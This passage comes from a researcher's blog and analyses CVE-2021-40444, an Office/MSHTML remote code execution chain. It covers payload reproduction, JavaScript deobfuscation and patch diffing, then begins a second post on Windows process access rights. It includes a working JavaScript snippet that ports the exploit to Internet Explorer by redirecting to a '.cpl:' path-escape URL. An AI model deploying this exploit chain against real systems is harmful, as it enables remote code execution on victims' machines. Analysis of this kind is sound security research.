https://billdemirkapi.me/content/images/2021/11/image-52.png 962w" sizes="(min-width: 720px) 720px"><figcaption>Network Requests of Barebone Word Document</figcaption></figure><p>We had now found and fixed the issue with our barebone HTML page! But our work isn&apos;t over yet. 
We wouldn&#x2019;t be great reverse engineers if we didn&#x2019;t investigate <em>why</em> the client was expecting 4096 bytes in the first place.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-55.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="904" height="210" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-55.png 600w, https://billdemirkapi.me/content/images/2021/11/image-55.png 904w" sizes="(min-width: 720px) 720px"><figcaption>Partial Pseudocode of CHtmPre::GetReadRequestSize</figcaption></figure><p>I traced the origin of the expected size back to a call from CHtmPre::Read to CHtmPre::GetReadRequestSize. Stepping through this function in a debugger, I found that a field at offset 136 of the CHtmPre class represented the request size the client should expect. How can we find out why this value is 4096? Something had to write to it at some point.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-56.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1070" height="187" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-56.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-56.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-56.png 1070w" sizes="(min-width: 720px) 720px"><figcaption>Partial Pseudocode of CHtmPre Constructor</figcaption></figure><p>Since we were looking at a class function of the CHtmPre class, I set a breakpoint on the constructor for this class.
When the debugger reached the constructor, I placed a write memory breakpoint for the field offset we saw (+ 136).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-57.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1194" height="139" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-57.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-57.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-57.png 1194w" sizes="(min-width: 720px) 720px"><figcaption>Partial Pseudocode of CEncodeReader Constructor when the Write Breakpoint Hit</figcaption></figure><p>The breakpoint hit! And not so far away either. The 4096 value was being set inside of another object constructor, CEncodeReader::CEncodeReader. This object was instantiated by the CHtmPre constructor we just hooked. Where did the 4096 come from then? <strong>It was hardcoded into the CHtmPre constructor!</strong></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-58.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1036" height="161" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-58.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-58.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-58.png 1036w" sizes="(min-width: 720px) 720px"><figcaption>Partial Pseudocode of CHtmPre Constructor, Highlighting Hardcoded 4096 Value</figcaption></figure><p>When the CHtmPre instance was constructed, it received a default read size of 4096 bytes. The client was reading the bytes from the HTTP response <em>before </em>this field was updated with the real response size.
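</p><p>For reference, the two-step breakpoint dance described above translates to roughly the following in WinDbg. Both the symbol name (which assumes public symbols) and the use of @rcx for <code>this</code> at function entry (the x64 calling convention) are assumptions; the second command is run once the first breakpoint hits.</p>

```
$$ Break whenever a CHtmPre object is constructed.
bp mshtml!CHtmPre::CHtmPre
$$ Once that breakpoint hits, watch 4-byte writes to this+136 (0x88).
ba w4 @rcx+0x88
```

<p>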
Since our barebone payload was just a small HTML page under 4096 bytes, the client thought that the server hadn&#x2019;t sent the required response and thus terminated the execution.</p><p>The attacker&apos;s payload worked because it was above 4096 bytes in size. We just found a bug still present in Microsoft&#x2019;s HTML processor!</p><h3 id="reproduction-fixing-the-attackers-payload">Reproduction: Fixing the Attacker&apos;s Payload</h3><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-24.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="778" height="374" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-24.png 600w, https://billdemirkapi.me/content/images/2021/11/image-24.png 778w" sizes="(min-width: 720px) 720px"><figcaption>Network Requests After Executing with Side.html Payload</figcaption></figure><p>We figured out how to make sure our payload executes. If you recall from an earlier section of this blog post, we saw that a request to a &quot;ministry.cab&quot; file was being made by the attacker&apos;s side.html payload. Fortunately for us, the attacker&#x2019;s sample came with the CAB file the server was originally serving.</p><p>This CAB file was interesting. It had a single file named &quot;<strong>../</strong>msword.inf&quot;, suggesting a relative path escape attack. This INF file was a PE binary for the attacker&#x2019;s Cobalt Strike beacon. I replaced this file with a simple DLL that opened Calculator for testing.
Unfortunately, when I uploaded this CAB file to my server, I saw a successful request to it but no Calculator.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-59.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="823" height="257" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-59.png 600w, https://billdemirkapi.me/content/images/2021/11/image-59.png 823w" sizes="(min-width: 720px) 720px"><figcaption>Operations involving msword.inf from CAB file</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-60.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="824" height="355" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-60.png 600w, https://billdemirkapi.me/content/images/2021/11/image-60.png 824w" sizes="(min-width: 720px) 720px"><figcaption>Call stack of msword.inf Operation</figcaption></figure><p>I monitored Word with ProcMon once again to try and see what was happening with the CAB file. I filtered for &quot;msword.inf&quot; and found interesting operations where Word was writing it to the VM user&apos;s %TEMP% directory. 
The &quot;VerifyTrust&quot; function name in the call stack suggested that the INF file was written to the TEMP directory while Word was trying to verify the CAB file&apos;s signature.</p><p>Let&apos;s step through these functions to figure out what&apos;s going on.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-62.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="704" height="388" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-62.png 600w, https://billdemirkapi.me/content/images/2021/11/image-62.png 704w"><figcaption>Partial Pseudocode of Cwvt::VerifyTrust</figcaption></figure><p>After stepping through Cwvt::VerifyTrust with a debugger, I found that the function attempted to verify the signature of files contained within the CAB file. Specifically, if the CAB file included an INF file, it would extract it to disk and try to verify its digital signature.</p><p>The extraction process didn&apos;t have any security measures, allowing an attacker to use relative path escapes to break out of the temporary directory generated for the CAB file.</p><p>The attackers were using a zero-day with ActiveX controls:</p><ol><li>The attacker&#x2019;s JavaScript (side.html) would attempt to execute the CAB file as an ActiveX control.</li><li>This triggered Microsoft&#x2019;s security controls to verify that the CAB file was signed and safe to execute.</li><li>Unfortunately, Microsoft handled this CAB file without care: although the signature verification failed, the process still allowed an attacker to extract the INF file to another location with relative path escapes.</li></ol><p>If there were a <strong>user-writable</strong> directory where simply planting a malicious INF file caused it to execute, the attackers could have stopped here with their exploit.
This isn&#x2019;t a possibility though, so they needed some way to execute the INF file as a PE binary.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-64.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1004" height="201" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-64.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-64.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-64.png 1004w" sizes="(min-width: 720px) 720px"><figcaption>Strange control.exe Execution with INF File in Command Line</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-65.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1190" height="159" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-65.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-65.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-65.png 1190w" sizes="(min-width: 720px) 720px"><figcaption>Strange rundll32.exe Execution with INF File in Command Line</figcaption></figure><p>Going back to ProcMon, I tried to see why the INF file wasn&#x2019;t being executed. 
It looked like they were using <em>another </em>exploit to trigger the execution of &quot;control.exe&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-66.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1294" height="69" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-66.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-66.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-66.png 1294w" sizes="(min-width: 720px) 720px"><figcaption>&quot;.cpl&quot; Used as a URL Protocol</figcaption></figure><p>The attackers were triggering the execution of a Control Panel Item. The command line for control.exe suggested they were using the &quot;.cpl&quot; file extension <strong>as a URL protocol</strong>, then using relative path escapes to reach the INF file.</p><p>Why wasn&#x2019;t my Calculator DLL being executed then? Entirely my mistake! I was executing the Word document from a nested directory, but the attackers were only spraying a few relative path escapes that never reached my user directory.
This makes sense because this document is intended to be executed from a victim&apos;s Downloads folder, whereas I was hosting the file inside of a nested Documents directory.</p><p>I placed the Word document in my Downloads folder and&#x2026; voila:</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-67.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1140" height="584" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-67.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-67.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-67.png 1140w"><figcaption>Calculator being Executed by Word Document</figcaption></figure><h2 id="reversing-the-attackers-payload">Reversing the Attacker&apos;s Payload</h2><p>We have a working exploit! Now the next step to understanding the attack is to reverse engineer the attacker&#x2019;s malicious JavaScript. If you recall, it was somewhat obfuscated. 
As someone with experience with JavaScript obfuscators, though, I didn&#x2019;t think the attackers did too much.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-68.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1606" height="628" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-68.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-68.png 1000w, https://billdemirkapi.me/content/images/size/w1600/2021/11/image-68.png 1600w, https://billdemirkapi.me/content/images/2021/11/image-68.png 1606w" sizes="(min-width: 1200px) 1200px"><figcaption>Common JavaScript String Obfuscation Technique seen in Attacker&apos;s Code</figcaption></figure><p>A common pattern I see with attempts at string obfuscation in JavaScript is an array containing a bunch of strings, with the rest of the code retrieving strings through a helper function that references that array.</p><p>In this case, we can see a string array named &quot;a0_0x127f&quot;, which is referenced inside of the global function &quot;a0_0x15ec&quot;.
Looking at the rest of the JavaScript, we can see that several parts of it call this unknown function with a numerical index, suggesting that this function is used to retrieve a deobfuscated version of the string.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-69.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1240" height="250" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-69.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-69.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-69.png 1240w" sizes="(min-width: 720px) 720px"><figcaption>String Deobfuscation Script</figcaption></figure><p>This approach to string obfuscation is relatively easy to get past. I wrote a small script to find all calls to the decoding function, resolve what each string was, and replace the entire call with the real string.
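</p><p>The core of that script is a single regex-driven replace. A simplified sketch (the decoder name matches the sample; everything else is illustrative):</p>

```javascript
// Replace every call like a0_0x15ec(0x1f) with the string literal it
// resolves to, by invoking the decoder exactly as the obfuscated code does.
function inlineStrings(source, decoderName, decoder) {
  const callPattern = new RegExp(decoderName + '\\((0x[0-9a-fA-F]+)\\)', 'g');
  return source.replace(callPattern, (_, index) =>
    JSON.stringify(decoder(parseInt(index, 16))));
}
```

<p>Running this over the payload with its real decoder loaded turns every opaque index into a readable literal.</p><p>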
Instead of worrying about the mechanics of the deobfuscation function, we can just call into it like the real code does to retrieve the deobfuscated string.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-70.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="809" height="488" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-70.png 600w, https://billdemirkapi.me/content/images/2021/11/image-70.png 809w" sizes="(min-width: 720px) 720px"><figcaption><strong>Before </strong>String Deobfuscation</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-71.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="789" height="488" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-71.png 600w, https://billdemirkapi.me/content/images/2021/11/image-71.png 789w" sizes="(min-width: 720px) 720px"><figcaption><strong>After </strong>String Deobfuscation</figcaption></figure><p>This worked extremely well and we now have a relatively deobfuscated version of their script. The rest of the deobfuscation was just combining strings, getting rid of &quot;indirect&quot; calls to objects, and naming variables given their context. I can&#x2019;t cover each step in detail because there were a lot of minor steps for this last part, but there was nothing especially notable. 
I tried to name the variables as best I could given the surrounding context and added comments describing what I thought was happening.</p><p>Let&#x2019;s review what the script does.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-72.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="688" height="643" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-72.png 600w, https://billdemirkapi.me/content/images/2021/11/image-72.png 688w"><figcaption>Part #1 of Deobfuscated JavaScript: Create and Destroy an IFrame</figcaption></figure><p>In this first part, the attackers created an iframe element, retrieved the ActiveX scripting interface for that iframe, and destroyed the iframe. Although the iframe has been destroyed, the ActiveX interface is still live and can be used to execute arbitrary HTML/JavaScript.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-73.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="792" height="588" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-73.png 600w, https://billdemirkapi.me/content/images/2021/11/image-73.png 792w" sizes="(min-width: 720px) 720px"><figcaption>Part #2 of Deobfuscated JavaScript: Create Nested ActiveX HTML Documents</figcaption></figure><p>In this next part, the attackers used the destroyed iframe&apos;s ActiveX interface to create three nested HTML documents.
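</p><p>Paraphrased from the deobfuscated script, the pattern looks roughly like this (these are IE/MSHTML-only APIs, so it will not run in a modern browser, and the identifiers are illustrative rather than verbatim):</p>

```javascript
// Create an iframe, grab its scripting surface, then destroy the iframe.
var frame = document.createElement('iframe');
document.body.appendChild(frame);
var ActiveXCtor = frame.contentWindow['ActiveXObject'];
frame.parentNode.removeChild(frame);
// The scripting surface outlives the iframe and can still mint new
// HTML documents.
var nestedDoc = new ActiveXCtor('htmlfile');
```

<p>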
I am not entirely sure what purpose these nested documents serve, because the exploit works fine if the attackers use only the original ActiveX interface without any nesting.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-74.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1392" height="584" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-74.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-74.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-74.png 1392w" sizes="(min-width: 1200px) 1200px"><figcaption>Part #3 of Deobfuscated JavaScript: Create ActiveX Control and Trigger INF File</figcaption></figure><p>This final section is what performs the primary exploits.</p><p>The attackers make a request to the exploit CAB file (&quot;ministry.cab&quot;) with an XMLHttpRequest. Next, the attackers create a new ActiveX Control object inside the third nested HTML document created in the last step. The class ID and version of this ActiveX control are arbitrary and can be changed, but the important piece is that the ActiveX Control points at the previously requested CAB file. URLMON will automatically verify the signature of the ActiveX Control CAB file, which is when the malicious INF file is extracted into the user&apos;s temporary directory.</p><p>To trigger their malicious INF payload, the attackers use the &quot;.cpl&quot; file extension as a URL Protocol with a relative path escape in a new HTML document. 
This causes control.exe to start rundll32.exe, passing the INF file as the Control Panel Item to execute.</p><p>The fully deobfuscated and commented HTML/JS payload can be found <a href="https://gist.github.com/D4stiny/1692ded337b67bfbeea10f2269af81fe">here</a>.</p><h2 id="overview-of-the-attack">Overview of the Attack</h2><p>We covered a significant amount in the previous sections, let&apos;s summarize the attack from start to finish:</p><ol><li>A victim opens the malicious Word document.</li><li>Word loads the attacker&apos;s HTML page as an OLE object and executes the contained JavaScript.</li><li>An IFrame is created and destroyed, but a reference to its ActiveX scripting surface remains.</li><li>The CAB file is invoked by creating an ActiveX control for it.</li><li>While the CAB file&apos;s signature is verified, the contained INF file is written to the user&apos;s Temp directory.</li><li>Finally, the INF is invoked by using the &quot;.cpl&quot; extension as a URL protocol, using relative path escapes to reach the temporary directory.</li></ol><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2022/01/image-1.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="544" height="528"></figure><h2 id="reversing-microsofts-patch">Reversing Microsoft&apos;s Patch</h2><p>When Microsoft released its advisory for this bug on September 7th, they had no patch! To save face, they claimed Windows Defender was a mitigation, but that was just a detection for the attacker&apos;s exploit. The underlying vulnerability was untouched.</p><p>It took them nearly a month from when the first known sample was uploaded to VirusTotal (August 19th) to finally fix the issue on September 14th with a Patch Tuesday update. 
Let&#x2019;s take a look at the major changes in this patch.</p><p>A popular practice among security researchers is patch diffing: comparing a binary that used to contain a vulnerability against its patched equivalent to pinpoint exactly what changed. I updated my system but saved several DLL files from my unpatched machine. There are a couple of tools that are great for finding assembly-level differences between two similar binaries.</p><ol><li><a href="https://www.zynamics.com/bindiff.html">BinDiff</a> by Zynamics</li><li><a href="https://github.com/joxeankoret/diaphora">Diaphora</a> by Joxean Koret</li></ol><p>I went with Diaphora because it is more advanced than BinDiff and allows for easy pseudo-code level comparisons. The primary binaries I diff&apos;d were:</p><ol><li>IEFRAME.dll - This is what executed the URL protocol for &quot;.cpl&quot;.</li><li>URLMON.dll - This is what had the CAB file extraction exploit.</li></ol><h3 id="reversing-microsofts-patch-ieframe">Reversing Microsoft&apos;s Patch: IEFRAME</h3><p>Once I diff&#x2019;d the updated and unpatched binary, I found ~1000 total differences, but only ~30 major changes. One function that had heavy changes and was associated with the CPL exploit was _AttemptShellExecuteForHlinkNavigate.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-76.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="849" height="414" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-76.png 600w, https://billdemirkapi.me/content/images/2021/11/image-76.png 849w"><figcaption>Pseudocode Diff of _AttemptShellExecuteForHlinkNavigate</figcaption></figure><p>In the old version of IEFRAME, this function simply used <a href="https://docs.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-shellexecutew">ShellExecuteW</a> to open the URL protocol with no verification. 
This is why the CPL file extension was processed as a URL protocol.</p><p>In the new version, they added a significant number of checks for the URL protocol. Let&#x2019;s compare the differences.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-78.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1217" height="539" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-78.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-78.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-78.png 1217w" sizes="(min-width: 720px) 720px"><figcaption>Patched _AttemptShellExecuteForHlinkNavigate Pseudocode</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-79.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1188" height="564" srcset="https://billdemirkapi.me/content/images/size/w600/2021/11/image-79.png 600w, https://billdemirkapi.me/content/images/size/w1000/2021/11/image-79.png 1000w, https://billdemirkapi.me/content/images/2021/11/image-79.png 1188w" sizes="(min-width: 720px) 720px"><figcaption>New IsValidSchemeName Function</figcaption></figure><p>In the patched version of _AttemptShellExecuteForHlinkNavigate, the primary addition that prevents the use of file extensions as URL Protocols is the call to IsValidSchemeName.</p><p>This function takes the URL Protocol that is being used (i.e &quot;.cpl&quot;) and verifies that all characters in it are alphanumerical. For example, this exploit used the CPL file extension to trigger the INF file. 
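</p><p>The check amounts to a tiny character-class test. The following is my own hypothetical C reimplementation for illustration, not Microsoft&apos;s decompiled code:</p><pre><code class="language-C">#include "stddef.h"
#include "ctype.h"

//
// Hypothetical sketch of the patched scheme validation: accept a
// scheme name only if it is non-empty and every character is
// alphanumeric, mirroring the behavior described above.
//
int IsValidSchemeName(const char *scheme)
{
    if (scheme == NULL || *scheme == '\0')
    {
        return 0;
    }
    for (const char *p = scheme; *p != '\0'; p++)
    {
        if (!isalnum((unsigned char)*p))
        {
            return 0;
        }
    }
    return 1;
}</code></pre><p>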
With this patch, &quot;.cpl&quot; would fail the IsValidSchemeName function because it contains a period, which is not alphanumeric.</p><p>An important factor to note is that this patch for using file extensions as URL Protocols only applies to MSHTML. File extensions are still exposed for use in other attacks against ShellExecute, which is why I wouldn&apos;t be surprised if we saw similar techniques in future vulnerabilities.</p><h3 id="reversing-microsofts-patch-urlmon">Reversing Microsoft&apos;s Patch: URLMON</h3><p>I performed the same patch diffing on URLMON and found a major change in catDirAndFile. This function was used during extraction to generate the output path for the INF file.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2021/11/image-80.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="432" height="283"><figcaption>Patched catDirAndFile Pseudocode</figcaption></figure><p>The patch for the CAB extraction exploit was extremely simple. All Microsoft did was replace any instance of a forward slash with a backslash. This prevents the INF extraction exploit of the CAB file because backslashes are ignored for relative path escapes.</p><h2 id="abusing-cve-2021-40444-in-internet-explorer">Abusing CVE-2021-40444 in Internet Explorer</h2><p>Although Microsoft&apos;s advisory covers an attack scenario where this vulnerability is abused in Microsoft Office, could we exploit this bug in another context?</p><p>Since Microsoft Office uses the same engine Internet Explorer uses to display web pages, could CVE-2021-40444 be abused to gain remote code execution from a malicious page opened in IE? 
When I tried to visit the same payload used in the Word document, the exploit did not work &quot;out of the box&quot;, specifically due to an error with the pop-up blocker.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2022/01/image-2.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="862" height="50" srcset="https://billdemirkapi.me/content/images/size/w600/2022/01/image-2.png 600w, https://billdemirkapi.me/content/images/2022/01/image-2.png 862w" sizes="(min-width: 720px) 720px"><figcaption>IE blocks .cpl popup</figcaption></figure><p>Although the CAB extraction exploit was successfully triggered, the attempt to launch the payload failed because Internet Explorer considered the &quot;.cpl&quot; exploit to be creating a pop-up.</p><p>Fortunately, we can port the .cpl exploit to get around this pop-up blocker relatively easily. Instead of creating a new page, we can simply redirect the current page to the &quot;.cpl&quot; URL.</p><pre><code class="language-javascript">function redirect() {
    //
    // Redirect current window without creating new one,
    // evading the IE pop up blocker.
    //
    window.location = &quot;.cpl:../../../AppData/Local/Temp/Low/msword.inf&quot;;
    document.getElementById(&quot;status&quot;).innerHTML = &quot;Done&quot;;
}

//
// Trigger in 500ms to give time for the .cab file to extract.
//
setTimeout(function() {
    redirect()
}, 500);</code></pre><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2022/01/image-3.png" class="kg-image" alt="Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit" loading="lazy" width="1062" height="591" srcset="https://billdemirkapi.me/content/images/size/w600/2022/01/image-3.png 600w, https://billdemirkapi.me/content/images/size/w1000/2022/01/image-3.png 1000w, https://billdemirkapi.me/content/images/2022/01/image-3.png 1062w" sizes="(min-width: 720px) 720px"></figure><p>With the small addition of the redirect, CVE-2021-40444 works without issue in Internet Explorer. The complete code for this ported HTML/JS payload can be found <a href="https://gist.github.com/D4stiny/4fd437bad4233856a7cebd42fb3057e5">here</a>.</p><h2 id="conclusion">Conclusion</h2><p>CVE-2021-40444 is in fact composed of several vulnerabilities, as we investigated in this blog post. Not only was there the initial step of extracting a malicious file to a predictable location through the CAB file exploit, but there was also the fact that URL Protocols could be file extensions.</p><p>In the latest patch, Word still executes pages with JavaScript if you use the MHTML protocol. What&#x2019;s frightening to me is that the entire attack surface of Internet Explorer is exposed to attackers through Microsoft Word. That is <em><strong>a lot</strong></em> of legacy code. 
Time will tell what other vulnerabilities attackers will abuse in Internet Explorer through Microsoft Office.</p>]]></content:encoded></item><item><title><![CDATA[Abusing Windows’ Implementation of Fork() for Stealthy Memory Operations]]></title><description><![CDATA[<p><em>Note: Another researcher recently <a href="https://twitter.com/diversenok_zero/status/1463844989612568581">tweeted</a> about the technique discussed in this blog post; this is addressed </em><a href="#didnt-i-see-this-on-twitter-yesterday"><em>in the last section of the blog</em></a><em> (warning, spoilers!).</em></p><p>To access information about a running process, developers generally have to open a handle to the process through the <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">OpenProcess</a> API specifying a combination of</p>]]></description><link>https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/</link><guid isPermaLink="false">619fffdca39fe110b6ef5796</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Fri, 26 Nov 2021 04:32:04 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/11/process_forking-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2021/11/process_forking-1.png" alt="Abusing Windows&#x2019; Implementation of Fork() for Stealthy Memory Operations"><p><em>Note: Another researcher recently <a href="https://twitter.com/diversenok_zero/status/1463844989612568581">tweeted</a> about the technique discussed in this blog post; this is addressed </em><a href="#didnt-i-see-this-on-twitter-yesterday"><em>in the last section of the blog</em></a><em> (warning, spoilers!).</em></p><p>To access information about a running process, developers generally have to open a handle to the process through the <a 
href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">OpenProcess</a> API specifying a combination of 13 different <em>process access rights:</em></p><ol><li><code>PROCESS_ALL_ACCESS</code> - All possible access rights for a process.</li><li><code>PROCESS_CREATE_PROCESS</code> - Required to create a process.</li><li><code>PROCESS_CREATE_THREAD</code> - Required to create a thread.</li><li><code>PROCESS_DUP_HANDLE</code> - Required to duplicate a handle using DuplicateHandle.</li><li><code>PROCESS_QUERY_INFORMATION</code> - Required to retrieve general information about a process such as its token, exit code, and priority class.</li><li><code>PROCESS_QUERY_LIMITED_INFORMATION</code> - Required to retrieve certain limited information about a process.</li><li><code>PROCESS_SET_INFORMATION</code> - Required to set certain information about a process such as its priority.</li><li><code>PROCESS_SET_QUOTA</code> - Required to set memory limits using SetProcessWorkingSetSize.</li><li><code>PROCESS_SUSPEND_RESUME</code> - Required to suspend or resume a process.</li><li><code>PROCESS_TERMINATE</code> - Required to terminate a process using TerminateProcess.</li><li><code>PROCESS_VM_OPERATION</code> - Required to perform an operation on the address space of a process (VirtualProtectEx, WriteProcessMemory).</li><li><code>PROCESS_VM_READ</code> - Required to read memory in a process using ReadProcessMemory.</li><li><code>PROCESS_VM_WRITE</code> - Required to write memory in a process using WriteProcessMemory.</li></ol><p>The access rights requested will impact whether or not a handle to the process is returned. 
